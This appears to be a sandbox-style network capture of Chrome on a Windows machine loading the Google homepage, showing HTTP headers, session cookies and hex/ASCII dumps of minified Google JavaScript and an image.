2024-12-12 21:40:21 UTC	819	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1151965 Date: Thu, 12 Dec 2024 21:40:20 GMT Expires: Fri, 12 Dec 2025 21:40:20 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:21 UTC	571	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// Copyright Google LLC SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Id
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 61 2c 6e 63 61 2c 79 63 61 2c 7a 63 61 2c 41 63 61 2c 42 63 61 2c 43 63 61 2c 76 63 61 2c 44 63 61 2c 73 63 61 2c 45 63 61 2c 72 63 61 2c 74 63 61 2c 75 63 61 2c 46 63 61 2c 47 63 61 2c 48 63 61 2c 4a 63 61 2c 53 63 61 2c 54 63 61 2c 58 63 61 2c 59 63 61 2c 62 64 61 2c 65 64 61 2c 5a 63 61 2c 64 64 61 2c 63 64 61 2c 61 64 61 2c 24 63 61 2c 66 64 61 2c 67 64 61 2c 68 64 61 2c 6a 64 61 2c 6f 64 61 2c 70 64 61 2c 78 64 61 2c 79 64 61 2c 7a 64 61 2c 41 64 61 2c 42 64 61 2c 43 64 61 2c 71 64 61 2c 44 64 61 2c 47 64 61 2c 49 64 61 2c 48 64 61 2c 4b 64 61 2c 4d 64 61 2c 4c 64 61 2c 4f 64 61 2c 4e 64 61 2c 52 64 61 2c 51 64 61 2c 53 64 61 2c 57 64 61 2c 58 64 61 2c 24 64 61 2c 62 65 61 2c 65 65 61 2c 66 65 61 2c 69 65 61 2c 7a 62 2c 6f 65 61 2c 72 65 61 2c 77 65 Data Ascii: a,nca,yca,zca,Aca,Bca,Cca,vca,Dca,sca,Eca,rca,tca,uca,Fca,Gca,Hca,Jca,Sca,Tca,Xca,Yca,bda,eda,Zca,dda,cda,ada,$ca,fda,gda,hda,jda,oda,pda,xda,yda,zda,Ada,Bda,Cda,qda,Dda,Gda,Ida,Hda,Kda,Mda,Lda,Oda,Nda,Rda,Qda,Sda,Wda,Xda,$da,bea,eea,fea,iea,zb,oea,rea,we
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 6d 76 61 2c 6e 76 61 2c 77 76 61 2c 76 76 61 2c 44 76 61 2c 46 76 61 2c 45 76 61 2c 47 76 61 2c 4f 76 61 2c 50 76 61 2c 53 76 61 2c 4d 76 61 2c 56 76 61 2c 57 76 61 2c 66 77 61 2c 6d 77 61 2c 6e 77 61 2c 6f 77 61 2c 73 77 61 2c 72 77 61 2c 75 77 61 2c 74 77 61 2c 76 77 61 2c 78 77 61 2c 41 77 61 2c 44 77 61 2c 45 77 61 2c 48 77 61 2c 49 77 61 2c 4a 77 61 2c 4d 77 61 2c 4b 77 61 2c 57 77 61 2c 56 77 61 2c 58 77 61 2c 61 78 61 2c 6c 78 61 2c 6d 78 61 2c 6e 78 61 2c 6f 78 61 2c 70 78 61 2c 71 78 61 2c 72 78 61 2c 73 78 61 2c 7a 78 61 2c 42 78 61 2c 43 78 61 2c 44 78 61 2c 45 78 61 2c 46 78 61 2c 47 78 61 2c 48 78 61 2c 4d 78 61 2c 50 78 61 2c 53 78 61 2c 55 78 61 2c 57 78 61 2c 24 78 61 2c 61 79 61 2c 62 79 61 2c 63 79 61 2c 66 79 61 2c 67 79 61 2c 69 79 61 Data Ascii: mva,nva,wva,vva,Dva,Fva,Eva,Gva,Ova,Pva,Sva,Mva,Vva,Wva,fwa,mwa,nwa,owa,swa,rwa,uwa,twa,vwa,xwa,Awa,Dwa,Ewa,Hwa,Iwa,Jwa,Mwa,Kwa,Wwa,Vwa,Xwa,axa,lxa,mxa,nxa,oxa,pxa,qxa,rxa,sxa,zxa,Bxa,Cxa,Dxa,Exa,Fxa,Gxa,Hxa,Mxa,Pxa,Sxa,Uxa,Wxa,$xa,aya,bya,cya,fya,gya,iya
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 7d 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 7d 7d 61 3d 63 3d 3d 3d 64 2e 6c 65 6e 67 74 68 3f 64 3a 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 61 3b 7d 2c 30 29 7d 3b 5f 2e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 63 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 69 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 68 61 61 3f 5f 2e 66 61 3f 5f 2e 66 61 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 Data Ascii: ++]=f>>6&63\|128}d[c++]=f&63\|128}}a=c===d.length?d:d.subarray(0,c)}return a};_.da=function(a){_.ca.setTimeout(function(){throw a;},0)};_.ea=function(){var a=_.ca.navigator;return a&&(a=a.userAgent)?a:""};iaa=function(a){return _.haa?_.fa?_.fa.brands.some(f
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 20 69 6e 20 62 7d 29 5d 7c 7c 22 22 7d 7d 3b 5f 2e 74 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 62 26 26 62 5b 31 5d 29 72 65 74 75 72 6e 20 62 5b 31 5d 3b 62 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 61 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 61 26 26 61 5b 31 5d 29 73 77 69 74 63 68 28 61 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 62 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 Data Ascii: (function(d){return d in b})]\|\|""}};_.taa=function(a){var b=/rv: ([\d\.])/.exec(a);if(b&&b[1])return b[1];b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),c[1]=="7.0")if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 6d 61 63 4f 53 22 3a 5f 2e 6a 61 28 22 4d 61 63 69 6e 74 6f 73 68 22 29 7d 3b 5f 2e 7a 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 4c 69 6e 75 78 22 3a 5f 2e 6a 61 28 22 4c 69 6e 75 78 22 29 7d 3b 5f 2e 41 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 57 69 6e 64 6f 77 73 22 3a 5f 2e 6a 61 28 22 57 69 6e 64 6f 77 73 22 29 7d 3b 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 43 68 72 6f 6d 65 20 4f 53 22 3a 5f 2e Data Ascii: eturn waa()?_.fa.platform==="macOS":_.ja("Macintosh")};_.zaa=function(){return waa()?_.fa.platform==="Linux":_.ja("Linux")};_.Aaa=function(){return waa()?_.fa.platform==="Windows":_.ja("Windows")};Baa=function(){return waa()?_.fa.platform==="Chrome OS":_.
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 20 65 3b 72 65 74 75 72 6e 2d 31 7d 3b 5f 2e 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 43 61 28 61 2c 62 29 3e 3d 30 7d 3b 5f 2e 45 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 44 61 28 61 2c 62 29 7c 7c 61 2e 70 75 73 68 28 62 29 7d 3b 5f 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 43 61 28 61 2c 62 29 3b 76 61 72 20 63 3b 28 63 3d 62 3e 3d 30 29 26 26 5f 2e 46 61 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 31 29 2e 6c 65 6e 67 74 68 3d 3d 31 7d 3b 0a 5f 2e 48 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 Data Ascii: e;return-1};_.Da=function(a,b){return _.Ca(a,b)>=0};_.Ea=function(a,b){_.Da(a,b)\|\|a.push(b)};_.Ga=function(a,b){b=_.Ca(a,b);var c;(c=b>=0)&&_.Fa(a,b);return c};_.Fa=function(a,b){return Array.prototype.splice.call(a,b,1).length==1};_.Haa=function(a,b){v
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 2e 50 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 5f 2e 49 61 28 61 29 7c 7c 21 5f 2e 49 61 28 62 29 7c 7c 61 2e 6c 65 6e 67 74 68 21 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 3b 63 3d 63 7c 7c 50 61 61 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 69 66 28 21 63 28 61 5b 65 5d 2c 62 5b 65 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 4e 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3e 62 3f 31 3a 61 3c 62 3f 2d 31 3a 30 7d 3b 50 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 0a 5f 2e 51 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d Data Ascii: .Pa=function(a,b,c){if(!_.Ia(a)\|\|!_.Ia(b)\|\|a.length!=b.length)return!1;var d=a.length;c=c\|\|Paa;for(var e=0;e<d;e++)if(!c(a[e],b[e]))return!1;return!0};_.Naa=function(a,b){return a>b?1:a<b?-1:0};Paa=function(a,b){return a===b};_.Qaa=function(a,b){var c={}
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 75 72 6e 20 61 62 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 0a 63 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 63 21 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 61 5b 64 5d 21 3d 3d 62 5b 64 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 65 6e 67 74 68 3d 3d 30 3f 5f 2e 56 61 28 29 3a 6e 65 77 20 5f 2e 57 61 28 61 2c 5f 2e 64 62 61 29 7d 3b 0a 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 Data Ascii: urn aba&&a!=null&&a instanceof Uint8Array};cba=function(a,b){var c=a.length;if(c!==b.length)return!1;for(var d=0;d<c;d++)if(a[d]!==b[d])return!1;return!0};_.eba=function(a){return a.length==0?_.Va():new _.Wa(a,_.dba)};gba=function(a){if(typeof a==="stri
2024-12-12 21:40:21 UTC	1390	IN	Data Raw: 65 67 65 72 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 75 62 61 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 76 62 61 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 28 30 2c 5f 2e 73 62 61 29 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 77 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 6c 65 6e 67 74 68 3c 62 2e 6c 65 6e 67 74 68 7c 7c 61 3d 3d 3d 62 29 72 65 74 75 72 6e 21 30 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 5b 63 5d 2c 65 3d 62 5b 63 5d 3b 69 66 28 64 3e 65 29 72 65 74 75 72 6e 21 31 Data Ascii: eger(b))throw Error(String(b));return uba?BigInt(a):a=vba(a)?a?"1":"0":(0,_.sba)(a)?a.trim()\|\|"0":String(a)};wba=function(a,b){if(a.length>b.length)return!1;if(a.length<b.length\|\|a===b)return!0;for(var c=0;c<a.length;c++){var d=a[c],e=b[c];if(d>e)return!1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49727	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:20 UTC	1470	OUT	POST /gen_204?s=webhp&t=cap&atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&rt=wsrt.6165,cbt.201,hst.82&opi=89978449&dt=&ts=300 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:21 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-73PxWuvPcgqIqlTYeJ020A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:21 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49733	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:22 UTC	1383	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:23 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/webp Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 660 Date: Thu, 12 Dec 2024 21:40:23 GMT Expires: Thu, 12 Dec 2024 21:40:23 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:23 UTC	660	IN	Data Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80 Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49734	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:22 UTC	2664	OUT	GET /async/hpba?yv=3&cs=0&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/dg%3D0/br%3D1/rs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:/xjs/_/ss/k%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/br%3D1/rs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/ck%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAA [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:23 UTC	1012	IN	HTTP/1.1 200 OK Version: 704846385 X-Content-Type-Options: nosniff Content-Type: text/plain; charset=UTF-8 Content-Disposition: attachment; filename="f.txt" Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:23 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:23 UTC	47	IN	Data Raw: 32 39 0d 0a 29 5d 7d 27 0a 32 31 3b 5b 22 52 31 68 62 5a 39 6d 38 41 63 6d 4a 37 4e 59 50 79 74 47 6c 55 41 22 2c 22 32 31 33 31 22 5d 0d 0a Data Ascii: 29)]}'21;["R1hbZ9m8AcmJ7NYPytGlUA","2131"]
